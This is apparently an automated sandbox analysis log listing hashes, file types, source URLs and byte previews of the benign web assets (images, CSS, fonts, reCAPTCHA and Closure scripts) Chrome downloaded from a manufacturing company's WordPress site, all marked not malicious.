                                                                            SHA-256:AAF8A9AA9480252683D5DF8C7857DC24C416244CB2116D6C2D41DCEA6D4F0EE8
                                                                            SHA-512:3749C8DEA565B7FDC0419B16D0312F59B3B0DDE064EB6E83A90842CABC3D977A58561CD5588B273BD815C10CF2D8379CE59BAC4EF4847F642F1E65EB3F1DDED2
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:{"pixels":{"ADWORDS":[{"pixelId":"832604732","limitedDataUseEnabled":false}],"LINKEDIN":[{"pixelId":"6093058","limitedDataUseEnabled":false}]},"enhancedConversionEventSettings":{}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):1895
                                                                            Entropy (8bit):7.762863282194426
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5806D7D3C303F6AA0D07E0DD27C487F6
                                                                            SHA1:E65077CF9975FD1A0F28DC84564F7F5D8ACD5CE1
                                                                            SHA-256:7CE3973A3C85E5F2DE09A09DA3CEBBFF8BFEE390E6A0868A8EBE5B542560D629
                                                                            SHA-512:3D20B3F53A502CF68C6203FE0CF7A197DD3BC5A63700C962EEEFAC5D119D9B07120E42143C65FFBCB90735F4E6542A72C379A59ED3E838F3E4DB84FF863D3B6C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/03/komatsu2.png
                                                                            Preview:.PNG........IHDR.......A.....v+.....qPLTEGpL......???...]]]...:::............JJJ...III......===KKK.........XXXGGG.........qqq...222......dddSSSMMM......WWW...,,,KKK<<<......hhh...777;;;HHH...&&&...NNN...SSS...:::eee... 111JJJ(((...[[[kkk%%%......CCC<<<......NNN(((;;;000???&&&DDD...;;;---999)))###<<<......@@@000```===..............."""###......777777...............%%%......---............AAA................o.[...{tRNS.3*.3...0.(1.-..+...2/..123..!!....*..."../ .....(#..).&..&&...0...),..+................%....$..02%.*2. #..(.....$+.!...3..U.c....*IDATx...S.I..-3au..."bP....1..1.4Y/0.W.h........a...Y....a.[e......{^....9r..#G..9....[....&yP...M.8j.I....3..E.T..)O'..f..? ..g............}L...E.~ef...AW...7.A.M..n.y+VqC.L.@~.n76.:?aa.1.c......x.....S~#L.._~...pM..#~")..8ZX...5.c./..%...mbV.7.../..[..~..'.....Dl.*O!y..`..?2lp.xW....6....:k..m..;.......hd.&....c......H.....e.9i...O.?.u.M..j....hg.\5).(.........a...V{....u.N...(..%54...Mt.&a.f.&..L.n.`e....5&"m.].H...@..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (516)
                                                                            Category:downloaded
                                                                            Size (bytes):12180
                                                                            Entropy (8bit):5.330956152418137
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7E78A9C41FD5EFFFB4F67B4F9C2D52F5
                                                                            SHA1:C36ACD6B9FD42DB1E61F8C94BC24272136621486
                                                                            SHA-256:CEF9EC23FBA4DAF522AE985C7B05518AA2D0DA453A2297F6A82DD07BB49D3380
                                                                            SHA-512:CC79CD676F4651D7978C130175DB1C9B7F7F949A405BFA7F3073601B948869ADA7CE3EE145442163162E50180566B44910202C272671159AA3AD03BEA16DBFAF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient-child/style.css?ver=6.6.2
                                                                            Preview:/*.Theme Name: Salient Child Theme.Description: This is a custom child theme for Salient.Theme URI: https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266.Author: ThemeNectar.Author URI: https://themeforest.net/user/themenectar.Template: salient.Version: 1.0.*/../*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * acumin-pro:. * - http://typekit.com/eulas/00000000000000003b9acafe. * - http://typekit.com/eulas/00000000000000003b9acafc. * - http://typekit.com/eulas/00000000000000003b9acafd. * - http://typekit.com/eulas/00000000000000003b9acaf2. * - http://typekit.com/eulas/00000000000000003b9acaf7. * - http://typekit.com/eulas/00000000000000003b9acaf4. * - http://typekit.com/eulas/00000000000000003b9acaf6. * - http://typekit.com/eulas/00000000000000003b
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (353)
                                                                            Category:downloaded
                                                                            Size (bytes):39738
                                                                            Entropy (8bit):4.972024528639363
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:051A48CF0660A088E37487842A8896F9
                                                                            SHA1:849DB5EBCA8E63D8883377FF07C91FC6F21B601D
                                                                            SHA-256:A2B4C3AD220C8D28533887965FBB1E6C1382588D200EB9D95250F929A567BA1A
                                                                            SHA-512:41D81A48D117CC79EC5DCA1793DBE56FF32024C04992E1BE3F3E0B99C772FE5BAAF629699E7CAD6B7501118B964EE24DCC5FD17E146B21C2AA58D6BB1F356FFA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=7.1
                                                                            Preview:...vc_parallax-inner iframe,..vc_video-bg iframe {. max-width: 1000%.}...vc_clearfix:after,..vc_column-inner::after,..vc_el-clearfix,..vc_row:after {. clear: both.}...container:before,..container:after,..container-fluid:before,..container-fluid:after,..row:before,..row:after,..modal-footer:before,..modal-footer:after,..vc_row:before,..vc_row:after {. content: " ";. display: table;.}..container:after,..container-fluid:after,..row:after,..vc_row:after {. clear: both;.}...vc-composer-icon,.[class*=" vc_arrow-icon-"],.[class^=vc_arrow-icon-] {. speak: none;. font-variant: normal;. text-transform: none;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale.}...vc_row:after,..vc_row:before {. content: " ";. display: table.}../*nectar addition*/.@media (max-width: 690px) {. .vc_hidden-xs {. display: none!important. }. .vc_el-clearfix-xs {. clear: both. }.}..@media (min-width: 691px) and (max-width: 999px) {. .vc_hi
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 824 x 1315, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):565800
                                                                            Entropy (8bit):7.993251956823239
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:FB78388421BB42728A936814DA8CFAC0
                                                                            SHA1:DA34ADD4ED0DB95302EB8B0B57F4856DFB6BDF22
                                                                            SHA-256:39A659DE9A5C6D635441FB76B5566380E92DD25FF184FFF466DD916E86BF8A10
                                                                            SHA-512:6426C89ECFE80C3F6378022913222AF6BC08DE65CE2D69BC8CF3283FA0C4659D5A0B2A786970FE5EC92FB5C2116407CDFE4A206F212C34F4348E7841C2D0F29C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...8...#......M......IDATx...1..@.E..h.V....%.V...3............................................................................................................6I.Z..@-..S.........\.......,.........q....e......p..7{w......M.I..V.j....".....-..Kb.....4GQl)..3........0..$....-..fJ..........4..z....z..Z..V........`R....U'_Ke".[~.;...........-}.{s.w..`P.I.cY..Sr.b....Nk.........$.).O.....0...]*....]..y.... ..F....l..,.....'...I.......+8/.....32..\S...K...FI..Q.....o...N.....sP..:Y.....1Vp.,[.l.....$.....8...S..Lq.._.ivy....0J..F.:y=1).m.^mj..s......S.q~...Z................Gu.|.....*....xB.$.$.)V.....l..........u..m.........g.-j...[...8-^l.+mj....d...>w..Le.c...0g...........s.....i.-jI...\..M..T6..`\&..<.k...EU.......E..y...o..Z.....g"..v..#..=.....S.aj....g.u;.4....f\4..8Hp...d...R.LS.....H..e...+.....y ..0|.ac...Ms.b..oc+^..........I.In.%&....e..l...........8?s.......f..`$&t..Q.|m]....}1M..`.<.f.n.]..iml....9...q..0e....z....j.d.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (701)
                                                                            Category:dropped
                                                                            Size (bytes):558800
                                                                            Entropy (8bit):5.6661858145390775
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                            SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                            SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                            SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x320, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                            Category:downloaded
                                                                            Size (bytes):31768
                                                                            Entropy (8bit):7.994569481915898
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:DF258094D466210F55BEE374304DBBCC
                                                                            SHA1:1ADB74847BB642EEE07256BE733EEF8B8F209C0C
                                                                            SHA-256:67963F5BCC10B8C85F9FA15C3152FD1DA02D540E9FB14CFCD3ACE9C97E3FB90F
                                                                            SHA-512:E01FF04FFD1B2BDF667E32157E22210B5AFF9C3F76192238F55E382B93B527F3348FB768FBC34357CCAC220ED16097BB1C605621ECB005150970063BD2C362EA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/sb-instagram-feed-images/467036108_691434706655862_830812027675844333_nlow.webp
                                                                            Preview:RIFF.|..WEBPVP8 .|..0P...*@.@.>I..D"......(....`.Sv.......k..3...l.0..{......u.I.....G.'.o.ov...~...@?.............}.............~A...O........;......z..>..:.o._...~....{./......Y....=..7....`.{...5....e}.................O./.........<.~....7....z&..`..w..&..9.R......Q.o..55.U.%B.....D..v...y..c.h..6....EhVy..GUN.......'.\.n..............6(k.T..{.y.:py.-.\.v'..8|...l9..].zh`.'.w]...c.@..F.W.........[..~...wS..Q.....Tz..7.3.....M'(..Q..j..=r{..O.Dh....d.....#.mTH...jG^K.1....gw.7.z.sC.L....2.....N4A.|0.._.A.}.. G.1...&..........S.$zT...6.nn/+...h....1.D.ON;...,......:..Z......V:..<....0c.....?,N..P.Vb....O....h..Z............b..!.`......#........f...$....l=..xb**..h.hC.gBh......._.=4.$.4..T.&.O.^!...s..c..R..d..M.3.a....2..9..t.M.,..o..W,...% \..b.S'.....U...jj........>....^.(]........a.".3...<.MqV........y.NhpA%e..W...........o...q\.K..9...pa...p.Yt..>.J.h....&T...h.....x.;.[..r9=)......0+....EjMc..v7.l...D...LVA^.Z)U...J..R.C.)y........8
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 64x64, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):1134
                                                                            Entropy (8bit):7.422407353783909
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:1DF4D6DF34A66DBDE677057CFE28FD80
                                                                            SHA1:3F34D9F027E29DCEFA1E52A26D5E63AF79B56CD9
                                                                            SHA-256:F21D839A64261D5C2A246FB86B648CDF4CEE0950008B533F4F64554BE1D2C3B7
                                                                            SHA-512:2FB8008A23A273B87559766D801DC0C4A38C282AD73F04056ECE5F99A5D6698B121629939AF36F64159F19A97B737F522E3721843C90FF4258E3CAEE0393EC35
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSuUGd5yoDxuUri1pR5UWDAvizEc9W1PV-8ty15LdE&s=10
                                                                            Preview:......JFIF......................................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...........7%.%77777777777777777777777777777777777777777777777777......@.@..".......................................3.........................!...U..."1ATq....BQ..#2..............................(........................q1R....!AS................?..(B.h..BtX.l8m.s.l..b..M.^w.IBql.......}s.Z..v..c.....`..-pr.H_.sBL..`.?.s..y....cst=.._...w.4%..(uZ.e2B.@.K]..n...Li6....E...\A....8...%s...&..VN....m.,>.&.Y.....4...D..U..k$(..B.b.......P..pY..N..@-.k.&`oDY*...d.....,......5......-L=M.....Wj...:..&...".6."..B.Q.v.....u.._i...b....8...-...#.h[..,Yv.%.p;..n..Q8.._.N..........:\.GU%Kl.]Y:..2.,.JY.L.".4ir.1.N.i........$.~...3,.s...Tb.....5...8M.TXI..T)e.D!.............X...RFo.U[5'}Aw.X..G....z$D....\.l....C.T..rbZ....N.f.._..fU..Nbm........P+.k..RS`X.._..G...t...&!.!t.._i.3)b...8......7{#c.=..n.X.......r...3..a...z._...G.[.%....T..D..=..z9_.x&T..i..J..J....5`..y&...>...j....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, progressive, precision 8, 1920x805, components 3
                                                                            Category:dropped
                                                                            Size (bytes):244024
                                                                            Entropy (8bit):7.987944038729058
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:92D39DF6D3B3A683E192E95DB0AC3F5A
                                                                            SHA1:C1C88D016EE15E27C153EA8163126CB90E9A6890
                                                                            SHA-256:B1F120C357699B7F12B6CB1AB47F01D331A9506EA215B92880A926519D7298D2
                                                                            SHA-512:078669548E7D7042CF058780E85549CC410A86F8584DE630E1449ADE247DD7C3136A54D7F14F329BBC4B4D95F7B8BD42AEE274353DC9DB1C3DE18610B207EA13
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:......................................................................................................................................................%...............5..................................................................Ow.ZTQ...JXJ .J..%4.J...l.&...).c...l.!jRDHc....bF.@..t.XS.#...H).X.L..B...C.....P..Dj.......!.D)(....I..$@..[N@%-dF.*%,L....NI*F...5.+Q.J."TB.X ..$-JH.%.W2.... Et.BQ.,`(,@.J.".l....@.V@.DH...`...d..........hQ...J.E........hJ.V9I@..1.....c$.Y.$.Q.(..\Hk) .U*.$.*AX)b..j.r..JD5..!.UcPH.@$bT Uc.4H#.!Z..Z..R.....1C".ENH.aX.cY#..p..#V.A..P.P..."1.9...!..T.........B..P.AE.Z.L....e...Q+,..sJ..FZ..J...pj.)..i"EB.$.....d.....h$9Ew/4......,...$....d..XP...,.R..JV.I.$..u#Q.F...#hd.X5)dJD...*...DV%....V..4H.r......I.;.B. .Yy+AJX+.Z.Pl.J.$r...i.1.-.h*Q.......2JP...@A.h."...2J.T...).h........X......h.T..!4.L.!t....\.!..F;...J.4".j.WN...,a..r24.h..X+IJ.bY.I.:p.....VJR.+..i..Z..9aeu.@..AZ.....+..D.H....+R.($@*P.V8C.j :C....Q.Z.(......R.....@.Dj.m$J..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1468
                                                                            Entropy (8bit):5.796659802956949
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4C2CA8EF9869137DAF4FE7C5BA37C045
                                                                            SHA1:70EF982285870138592DB2E4A88AE7DB2BBAF9F7
                                                                            SHA-256:CD56E661D403C85132F75954C833E843BBD318E38765C6C9E44AD184DD797B95
                                                                            SHA-512:853875FC14D5B04E62FE9B3ACF2AC8B5002FDB57D910010055A7923A328BFFB6574D175D88302FF519B5B7FE95FE57A97331194B47EA1DBD953BBB16B9840677
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LdOnlUpAAAAAKunKPeS6YuADZeBrS-fDPLUn16w');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (16202), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):16202
                                                                            Entropy (8bit):5.198632579075326
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6BC0F4EDDC26076F97FE3931C302E63C
                                                                            SHA1:19EA292DDAFD8325CA61B30FDECFB1EB1AA68718
                                                                            SHA-256:60BAD6380C989E19E7A90AFBE99940613C41031965AEDA90D8934A4DFE0F8CB4
                                                                            SHA-512:E4E0233EEE1FCB5E57BFB41750BF88BE8D722ADE456EAE6A10C3E05D767D679294BFDC867C3967D0F4134C4A004F8D68D2228D5A0AB16196E6817C04755D9B25
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woo-product-slider/src/Frontend/assets/css/swiper.min.css?ver=2.8.2
                                                                            Preview:@font-face{font-family:swiper-icons;src:url('data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNgYfzCOIGBlYGB0YcxjYGBwR1Kf2WQZGhhYGBiYGVmgAFGBiQQkOaawtDAoMBQxXjg/wEGPcYDDA4wNUA2CCgwsAAAO4EL6gAAeNpj2M0gyAACqxgGNWBkZ2D4/wMA+xkDdgAAAHjaY2BgYGaAYBkGRgYQiAHyGMF8FgYHIM3DwMHABGQrMOgyWDLEM1T9/w8UBfEMgLzE////P/5//f/V/xv+r4eaAAeMbAxwIUYmIMHEgKYAYjUcsDAwsLKxc3BycfPw8jEQA/
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):552
                                                                            Entropy (8bit):7.606580019695267
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:412BAA0AF99CDFFFD87276EB66881E2E
                                                                            SHA1:9D5611C5B8678BE4E9E99FFE2F51517908C59003
                                                                            SHA-256:075D777DE7039A7E317F85620A4B5EB94A3300241F63442C13C8DFD987D15AFB
                                                                            SHA-512:E8F889C0D155DFEA447A5308605CE4983CD17CFC031D6E94EB8338553C9BDAC93A3B126D94E661C7FEA22249980D211B3D4791D30F1F6BE0F9CF2433AD4D9CCF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/09/grader-dark.png
                                                                            Preview:RIFF ...WEBPVP8L..../c......m...q....CA.6...8..O........xR.F...vPp.........wGf..` ..h...a....8....nk[...R.|..i...^...".?.....u...i...q.......q1v..N.q.....5_%....k..d.........@..X=.lU_..9*........O.:..[.J...c..<...L5..!.....0N..P.}p2x....V^..I.wF.....~.8.t?..y.....kxZ.m....>.W...r...?.v@N...A...hF.t.p.....M\$.pkE3.O...`..H.F.0....z...Ylc.|...O.V#.`}H,.>.t.....$i|...(..4&^_?..>`..Y.7.6...x_b....M..IPYx......B..}.....-..v..,..f.&..P..$c...I$.....YpZT5;`[.......T....h...o..)M....-.u.K..~:.k...x)..s..l....Tc....e.....?..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):374
                                                                            Entropy (8bit):7.3901188930847175
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:76F17D12CF92BD9829315AB89558B93E
                                                                            SHA1:F8A2EB15FB2F41D8D934F3BD608CC24A8009816D
                                                                            SHA-256:85F494E3D7FF178F05F8E37F2CEF832E8428167D8CD45478C52C75CD982E67B5
                                                                            SHA-512:0C72AF71CF1BFBB9F705D6B863685D84C4229016D8C4852290EA9134F03C9DEBA11DCD76BB0BC417D39FEEE9CEE9E43FEDDF957EFFAE1D4E3E053F9B778F54AA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/youtube.png
                                                                            Preview:RIFFn...WEBPVP8La.../.......l[....'.1E.CB......".....{.p.....D8.m.M......4...B#YX&.....:..YD!##........2<"...4P.!.p...{.7.R>p..a|.;j:.....4=.3...+.i.M...|..P_....rz.."..4.....|H...3CM.p.+>.!.n...<..)...G.......d..r;<..M.......NY4...1t..;.$D..oK'....)-..bU..o.(......F .m.@.6.tH.......n1.!.M...J..@...?...P../.k_.E.....|[....'S.L...5..3..\..g....$7m.o.....gz.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format, TrueType, length 21912, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):21912
                                                                            Entropy (8bit):6.481892660618966
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:907BC7D21FDC1B3045D824DDD359DB8E
                                                                            SHA1:BB9CA1CFA43EA8DADD221B4428014D3B350E5E6A
                                                                            SHA-256:253DA3174FD517B8B572319807F488B09D2D8C73F0A654361B493FD6B72CC3B1
                                                                            SHA-512:9C42F7BDF90E17AED54F555FC27D6D25B9559E5D45E84F6EF2226F6A2F2558F0B802C7898EF5EA7A1718A9B9948251F6B9AA6F0D89F94AFD46ABAC59DE1B5E81
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/fonts/icomoon.woff?v=1.6
                                                                            Preview:wOFF......U.......UL........................OS/2.......`...`....cmap...h...<...<pai.gasp................glyf......N...N.7}..head..QH...6...6%V.Ihhea..Q....$...$...fhmtx..Q....p...pZ...loca..S.........%E..maxp..S.... ... ...Xname..S..........J..post..Ux... ... ...............................3...................................@........@...@............... ................................. ...D.@....... .........$.4.6.R.V.g.t.v............... ...........>.V.X............ .........#.4.6.P.T.g.t.v............... ...........>.U.X........... . . ............................#.........-.;.O.I.......H................................................................................................79..................79..................79...........+.......7....'...+......+....+......+.....................7'.....+......+./.+......+./..............&.C..%'>.54'..'&#"............32670.1..6?.64.47>.7632............#"'..'&5..... nJJTTJJn nJJT9i-....d..q..S88?@78T....T87@?88S..^.-i9TJJn nJJTT
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 64x64, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):1291
                                                                            Entropy (8bit):7.4998132703326155
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2B69A04AC084AEBA48C1E5FD689B907F
                                                                            SHA1:2F2C949F23F813D495A8513FCA61A4C8CEAE89B7
                                                                            SHA-256:1806F0F389C8AE5C88F5F50B8CF4199489C46BF81300F471EBBB87E549369563
                                                                            SHA-512:FC643387BF9C2D8BEC85D821E314D61AE6C1539009245569A2CEBF3430F769E6183F738DC66344B430B2B541DBA11725A0A66005A8862DA207E82A6D7D834A7D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQzrKJrSMGT82X1TlHMZtG-TUw6w_74J9XG_6oMvDzHsd5X755gAFLzVWYo&s=10
                                                                            Preview:......JFIF......................................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...........7%.%77777777777777777777777777777777777777777777777777......@.@..".......................................4.........................!1."AQa#....23Bqr.....b.................................".......................!1..Q................?..R.R.1.......)M..(Ltd..P...t.?J..)BR.1.....i$t8$V.'fd...L/*<....U...p._q..yc....YB..`...WwX..S.K..M..8.?.........q\.j%]..;~.ba#.o-........<l1..'^.d....a..'..W.....V..*.9.. ...S....KL.............g....:.. ..Q.wb.j..l'....l'...X."0.v.+.....1....o9.yZY..2}V..#.bFx>]zW..h7.z.3<1.Ug..\.m...Ut.;P......+B......v..m.m..$yf.I.e.n*/.*.k]*.y.UAl* $...r........P.H.X*.y..).Fk[[.1x...[..H..r.O.<.i[.N...IJH.&..M.......2K.G\4.<L.L...~}M8....q....[.[..2:.Xpq.8>..J..%..$.0$Q dL3*...t....WBXJ.a....K7h...M.....a.WLg<...^.8e.g....w..y....*.a.D.J....k.a.#...j.H......VD....0.'.H.if.l..8.(;......y.'....A...u.2k..i.....g..O...O....U"..r8.....>..\}(.].&....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (37002), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):37002
                                                                            Entropy (8bit):4.945395882044196
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5B9D72DDC7C6ABD490DD7F62800749FC
                                                                            SHA1:0CAE8B3EEFCE31ACA8CBCB16A4A3306DB62AA57F
                                                                            SHA-256:5FD926A169A1D72346FEC280E4A576BE954692E087E394DA5D414C8F33AEF97B
                                                                            SHA-512:DC1377C789506EAF49211941AF95EE169714C28E6DF3EB79C8F0CA6453D4C2759516CFAFA6D0203D97118EAAC829447C9AC11167505B5246CBF6F0174F17EF3F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/elements/element-recent-posts.css?ver=17.0.3
                                                                            Preview:.home .blog-recent .col .post-header{color:#999;margin-bottom:12px}.home .blog-recent .col .post-header h3 a{color:#27cfc3}.blog-recent .mejs-container{margin-bottom:15px}.home .blog-recent .col .post-header h3{margin-bottom:3px}.blog-recent[data-style=default] .col .post-header h3{margin-bottom:3px;letter-spacing:-.2px;font-size:16px;line-height:23px}.blog-recent .col .post-header a,.blog-recent .col .post-header h3 a:hover{color:inherit}.blog-recent .col{margin-bottom:40px}.blog-recent .col .video-wrap{position:relative;padding-bottom:54.25%;padding-top:5px;height:0;margin-bottom:15px}.blog-recent .col .video-wrap iframe{position:absolute;top:0;left:0;width:100%;height:100%}.blog-recent div:last-of-type{margin-right:0}@media only screen and (min-width:1000px){.blog-recent .col.span_3{width:23.4%}}body .blog-recent[data-style].columns-1 div:nth-child(1n+1),body .blog-recent[data-style].columns-2 div:nth-child(2n+2),body .blog-recent[data-style].columns-3 div:nth-child(3n+3),body .blog
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (55783), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):55783
                                                                            Entropy (8bit):4.972307557505244
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8DA5AF127602D3640D0DF7A595E2C88A
